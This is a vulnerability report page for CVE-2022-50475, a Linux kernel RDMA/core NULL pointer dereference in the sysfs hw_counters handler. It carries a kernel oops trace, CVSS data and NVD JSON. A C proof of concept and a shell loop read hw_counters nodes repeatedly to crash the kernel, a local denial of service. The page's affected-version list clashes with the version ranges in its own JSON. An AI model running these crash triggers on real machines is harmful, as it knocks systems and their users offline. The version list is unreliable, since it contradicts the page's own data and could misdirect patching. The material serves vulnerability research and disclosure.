Security Vulnerability Report
CVE-2022-50475 CVSS 5.5 MEDIUM

CVE-2022-50475

Published: 2025-10-04 16:15:44
Last Modified: 2026-01-23 16:36:59
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: RDMA/core: Make sure "ib_port" is valid when access sysfs node The "ib_port" structure must be set before adding the sysfs kobject, and reset after removing it, otherwise it may crash when accessing the sysfs node: Unable to handle kernel NULL pointer dereference at virtual address 0000000000000050 Mem abort info: ESR = 0x96000006 Exception class = DABT (current EL), IL = 32 bits SET = 0, FnV = 0 EA = 0, S1PTW = 0 Data abort info: ISV = 0, ISS = 0x00000006 CM = 0, WnR = 0 user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000e85f5ba5 [0000000000000050] pgd=0000000848fd9003, pud=000000085b387003, pmd=0000000000000000 Internal error: Oops: 96000006 [#2] PREEMPT SMP Modules linked in: ib_umad(O) mlx5_ib(O) nfnetlink_cttimeout(E) nfnetlink(E) act_gact(E) cls_flower(E) sch_ingress(E) openvswitch(E) nsh(E) nf_nat_ipv6(E) nf_nat_ipv4(E) nf_conncount(E) nf_nat(E) nf_conntrack(E) nf_defrag_ipv6(E) nf_defrag_ipv4(E) mst_pciconf(O) ipmi_devintf(E) ipmi_msghandler(E) ipmb_dev_int(OE) mlx5_core(O) mlxfw(O) mlxdevm(O) auxiliary(O) ib_uverbs(O) ib_core(O) mlx_compat(O) psample(E) sbsa_gwdt(E) uio_pdrv_genirq(E) uio(E) mlxbf_pmc(OE) mlxbf_gige(OE) mlxbf_tmfifo(OE) gpio_mlxbf2(OE) pwr_mlxbf(OE) mlx_trio(OE) i2c_mlxbf(OE) mlx_bootctl(OE) bluefield_edac(OE) knem(O) ip_tables(E) ipv6(E) crc_ccitt(E) [last unloaded: mst_pci] Process grep (pid: 3372, stack limit = 0x0000000022055c92) CPU: 5 PID: 3372 Comm: grep Tainted: G D OE 4.19.161-mlnx.47.gadcd9e3 #1 Hardware name: https://www.mellanox.com BlueField SoC/BlueField SoC, BIOS BlueField:3.9.2-15-ga2403ab Sep 8 2022 pstate: 40000005 (nZcv daif -PAN -UAO) pc : hw_stat_port_show+0x4c/0x80 [ib_core] lr : port_attr_show+0x40/0x58 [ib_core] sp : ffff000029f43b50 x29: ffff000029f43b50 x28: 0000000019375000 x27: ffff8007b821a540 x26: ffff000029f43e30 x25: 0000000000008000 x24: ffff000000eaa958 x23: 0000000000001000 x22: ffff8007a4ce3000 x21: ffff8007baff8000 x20: ffff8007b9066ac0 
x19: ffff8007bae97578 x18: 0000000000000000 x17: 0000000000000000 x16: 0000000000000000 x15: 0000000000000000 x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000 x11: 0000000000000000 x10: 0000000000000000 x9 : 0000000000000000 x8 : ffff8007a4ce4000 x7 : 0000000000000000 x6 : 000000000000003f x5 : ffff000000e6a280 x4 : ffff8007a4ce3000 x3 : 0000000000000000 x2 : aaaaaaaaaaaaaaab x1 : ffff8007b9066a10 x0 : ffff8007baff8000 Call trace: hw_stat_port_show+0x4c/0x80 [ib_core] port_attr_show+0x40/0x58 [ib_core] sysfs_kf_seq_show+0x8c/0x150 kernfs_seq_show+0x44/0x50 seq_read+0x1b4/0x45c kernfs_fop_read+0x148/0x1d8 __vfs_read+0x58/0x180 vfs_read+0x94/0x154 ksys_read+0x68/0xd8 __arm64_sys_read+0x28/0x34 el0_svc_common+0x88/0x18c el0_svc_handler+0x78/0x94 el0_svc+0x8/0xe8 Code: f2955562 aa1603e4 aa1503e0 f9405683 (f9402861)

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15.80(受影响的稳定分支)
Linux Kernel < 5.10.155
Linux Kernel < 5.4.225
Linux Kernel < 4.19.262
使用RDMA/core子系统的所有未修复内核版本(特别是BlueField平台4.19.161-mlnx.47.gadcd9e3等Mellanox定制版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
c
// CVE-2022-50475 PoC - Trigger NULL pointer dereference via sysfs access
// This PoC triggers the vulnerability by accessing RDMA port sysfs nodes
// while the ib_port structure is in an invalid state.
//
// What this program actually does, as written below: it enumerates
// /sys/class/infiniband/<dev>/ports/<port>/hw_counters with opendir()/readdir()
// and then open()s and read()s each path, once and then in a loop. It performs
// no other system interaction. It has no way to influence the kobject
// add/remove ordering that the CVE description identifies as the root cause
// (ib_port not yet set when the sysfs kobject is added, or not reset after it
// is removed); whether a read reaches a NULL ib_port depends entirely on
// kernel state the program does not control. On a patched kernel, or whenever
// ib_port is valid, the reads simply succeed or fail with an errno.
//
// Impact, per the CVSS 3.1 vector on this report (AV:L/AC:L/PR:L/UI:N/S:U/
// C:N/I:N/A:H): a local, low-privilege availability-only failure (kernel
// oops) - no confidentiality or integrity impact. The fix is the upstream
// RDMA/core patch referenced in this report; sysfs reads by unprivileged
// users of hw_counters are otherwise routine (the oops in the trace was
// produced by a plain `grep`).
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dirent.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

/**
 * Find RDMA device ports in sysfs.
 *
 * Walks /sys/class/infiniband and, for each device entry, its "ports"
 * subdirectory, writing one "<base>/<dev>/ports/<port>/hw_counters" string
 * per port into paths[]. Entries whose name starts with '.' are skipped;
 * a device whose "ports" directory cannot be opened is skipped silently.
 * There is no check that an entry is a directory, and each path is cut at
 * 256 bytes by snprintf() without a truncation check.
 *
 * @param paths     Caller-owned array of 256-byte buffers to fill.
 * @param max_paths Capacity of paths[]; enumeration stops when reached.
 * @return Number of paths written (0 if none found), or -1 if the base
 *         directory cannot be opened (perror() is printed in that case).
 */
int find_rdma_ports(char paths[][256], int max_paths) {
    DIR *dir, *subdir;
    struct dirent *entry, *subentry;
    char base_path[] = "/sys/class/infiniband";
    int count = 0;
    dir = opendir(base_path);
    if (!dir) {
        perror("Cannot open /sys/class/infiniband - RDMA not available");
        return -1;
    }
    // Iterate through RDMA devices
    while ((entry = readdir(dir)) != NULL && count < max_paths) {
        if (entry->d_name[0] == '.') continue;
        char dev_path[256];
        snprintf(dev_path, sizeof(dev_path), "%s/%s/ports", base_path, entry->d_name);
        subdir = opendir(dev_path);
        if (!subdir) continue;
        // Iterate through ports of each device
        while ((subentry = readdir(subdir)) != NULL && count < max_paths) {
            if (subentry->d_name[0] == '.') continue;
            snprintf(paths[count], 256, "%s/%s/hw_counters", dev_path, subentry->d_name);
            count++;
        }
        closedir(subdir);
    }
    closedir(dir);
    return count;
}

/**
 * Trigger the vulnerability by reading hw_counters sysfs node.
 *
 * Opens path read-only, issues a single read() of at most sizeof(buf)-1
 * bytes into a stack buffer, and closes the descriptor. The buffer
 * contents are never inspected, NUL-terminated or printed; only the byte
 * count or the errno string is logged.
 *
 * @param path NUL-terminated sysfs path to open.
 * @return -1 if open() fails; 0 otherwise, whether or not the read()
 *         succeeded (a failed read is reported but not treated as an error).
 */
int trigger_crash(const char *path) {
    int fd;
    char buf[4096];
    ssize_t ret;
    printf("[*] Accessing: %s\n", path);
    fd = open(path, O_RDONLY);
    if (fd < 0) {
        printf("[-] Cannot open %s: %s\n", path, strerror(errno));
        return -1;
    }
    // Reading triggers hw_stat_port_show -> NULL pointer dereference
    // NOTE(review): hw_stat_port_show is the handler named in the CVE's call
    // trace; whether this read reaches it with a NULL ib_port depends on
    // kernel state this program does not control - on a valid ib_port the
    // read just returns data or an errno.
    ret = read(fd, buf, sizeof(buf) - 1);
    close(fd);
    if (ret < 0) {
        printf("[+] Read failed (expected if kernel crashed): %s\n", strerror(errno));
        return 0;
    }
    printf("[+] Read %zd bytes successfully\n", ret);
    return 0;
}

/**
 * Entry point: enumerate hw_counters paths, read each once, then read them
 * repeatedly with a 1 ms pause between rounds. argc/argv are unused.
 *
 * @return 1 if no paths were found (or the sysfs base could not be opened),
 *         0 after the loops complete.
 */
int main(int argc, char *argv[]) {
    char paths[16][256];
    int num_ports, i;
    printf("=== CVE-2022-50475 PoC ===\n");
    printf("Linux Kernel RDMA/core NULL Pointer Dereference\n\n");
    // find_rdma_ports() returns -1 on a missing base directory; the <= 0
    // test folds that case together with "zero ports found".
    num_ports = find_rdma_ports(paths, 16);
    if (num_ports <= 0) {
        printf("[-] No RDMA ports found. Need RDMA-capable hardware.\n");
        printf("[-] Example: Mellanox ConnectX-5/BlueField SoC with mlx5_ib\n");
        return 1;
    }
    printf("[*] Found %d RDMA port(s)\n\n", num_ports);
    // Repeatedly access sysfs nodes to trigger race condition / crash
    // NOTE(review): the CVE description speaks of ib_port being set/reset
    // relative to kobject add/remove, not of a race the reader can widen;
    // "race condition" here is the PoC author's framing.
    for (i = 0; i < num_ports; i++) {
        trigger_crash(paths[i]);
    }
    // Aggressive loop to maximize chance of hitting the race window
    printf("\n[*] Entering aggressive trigger loop...\n");
    for (int round = 0; round < 100; round++) {
        for (i = 0; i < num_ports; i++) {
            trigger_crash(paths[i]);
        }
        usleep(1000);
    }
    printf("\n[*] Done. If kernel didn't crash, timing window was missed.\n");
    return 0;
}
// Alternative shell-only trigger:
// for i in $(seq 1 1000); do
//   cat /sys/class/infiniband/*/ports/*/hw_counters 2>/dev/null
// done
//
// Compile: gcc -o poc poc.c
// Run: ./poc (requires RDMA hardware and unpatched kernel)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50475", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:44.050", "lastModified": "2026-01-23T16:36:59.163", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/core: Make sure \"ib_port\" is valid when access sysfs node\n\nThe \"ib_port\" structure must be set before adding the sysfs kobject,\nand reset after removing it, otherwise it may crash when accessing\nthe sysfs node:\n Unable to handle kernel NULL pointer dereference at virtual address 0000000000000050\n Mem abort info:\n ESR = 0x96000006\n Exception class = DABT (current EL), IL = 32 bits\n SET = 0, FnV = 0\n EA = 0, S1PTW = 0\n Data abort info:\n ISV = 0, ISS = 0x00000006\n CM = 0, WnR = 0\n user pgtable: 4k pages, 48-bit VAs, pgdp = 00000000e85f5ba5\n [0000000000000050] pgd=0000000848fd9003, pud=000000085b387003, pmd=0000000000000000\n Internal error: Oops: 96000006 [#2] PREEMPT SMP\n Modules linked in: ib_umad(O) mlx5_ib(O) nfnetlink_cttimeout(E) nfnetlink(E) act_gact(E) cls_flower(E) sch_ingress(E) openvswitch(E) nsh(E) nf_nat_ipv6(E) nf_nat_ipv4(E) nf_conncount(E) nf_nat(E) nf_conntrack(E) nf_defrag_ipv6(E) nf_defrag_ipv4(E) mst_pciconf(O) ipmi_devintf(E) ipmi_msghandler(E) ipmb_dev_int(OE) mlx5_core(O) mlxfw(O) mlxdevm(O) auxiliary(O) ib_uverbs(O) ib_core(O) mlx_compat(O) psample(E) sbsa_gwdt(E) uio_pdrv_genirq(E) uio(E) mlxbf_pmc(OE) mlxbf_gige(OE) mlxbf_tmfifo(OE) gpio_mlxbf2(OE) pwr_mlxbf(OE) mlx_trio(OE) i2c_mlxbf(OE) mlx_bootctl(OE) bluefield_edac(OE) knem(O) ip_tables(E) ipv6(E) crc_ccitt(E) [last unloaded: mst_pci]\n Process grep (pid: 3372, stack limit = 0x0000000022055c92)\n CPU: 5 PID: 3372 Comm: grep Tainted: G D OE 4.19.161-mlnx.47.gadcd9e3 #1\n Hardware name: https://www.mellanox.com BlueField SoC/BlueField SoC, BIOS BlueField:3.9.2-15-ga2403ab Sep 8 2022\n pstate: 40000005 (nZcv daif -PAN -UAO)\n pc : 
hw_stat_port_show+0x4c/0x80 [ib_core]\n lr : port_attr_show+0x40/0x58 [ib_core]\n sp : ffff000029f43b50\n x29: ffff000029f43b50 x28: 0000000019375000\n x27: ffff8007b821a540 x26: ffff000029f43e30\n x25: 0000000000008000 x24: ffff000000eaa958\n x23: 0000000000001000 x22: ffff8007a4ce3000\n x21: ffff8007baff8000 x20: ffff8007b9066ac0\n x19: ffff8007bae97578 x18: 0000000000000000\n x17: 0000000000000000 x16: 0000000000000000\n x15: 0000000000000000 x14: 0000000000000000\n x13: 0000000000000000 x12: 0000000000000000\n x11: 0000000000000000 x10: 0000000000000000\n x9 : 0000000000000000 x8 : ffff8007a4ce4000\n x7 : 0000000000000000 x6 : 000000000000003f\n x5 : ffff000000e6a280 x4 : ffff8007a4ce3000\n x3 : 0000000000000000 x2 : aaaaaaaaaaaaaaab\n x1 : ffff8007b9066a10 x0 : ffff8007baff8000\n Call trace:\n hw_stat_port_show+0x4c/0x80 [ib_core]\n port_attr_show+0x40/0x58 [ib_core]\n sysfs_kf_seq_show+0x8c/0x150\n kernfs_seq_show+0x44/0x50\n seq_read+0x1b4/0x45c\n kernfs_fop_read+0x148/0x1d8\n __vfs_read+0x58/0x180\n vfs_read+0x94/0x154\n ksys_read+0x68/0xd8\n __arm64_sys_read+0x28/0x34\n el0_svc_common+0x88/0x18c\n el0_svc_handler+0x78/0x94\n el0_svc+0x8/0xe8\n Code: f2955562 aa1603e4 aa1503e0 f9405683 (f9402861)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-476"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": 
"cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.14", "versionEndExcluding": "5.15.86", "matchCriteriaId": "F3E497F0-212B-43AB-AFFF-C929EE6B5670"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "6.0.16", "matchCriteriaId": "C720A569-3D93-4D77-95F6-E2B3A3267D9F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1", "versionEndExcluding": "6.1.2", "matchCriteriaId": "77239F4B-6BB2-4B9E-A654-36A52396116C"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5e15ff29b156bbbdeadae230c8ecd5ecd8ca2477", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ac7a7d7079124f46180714b2d41a1703d37101bb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/cd06d32a71fbb198b2d43dddf7 ... (truncated)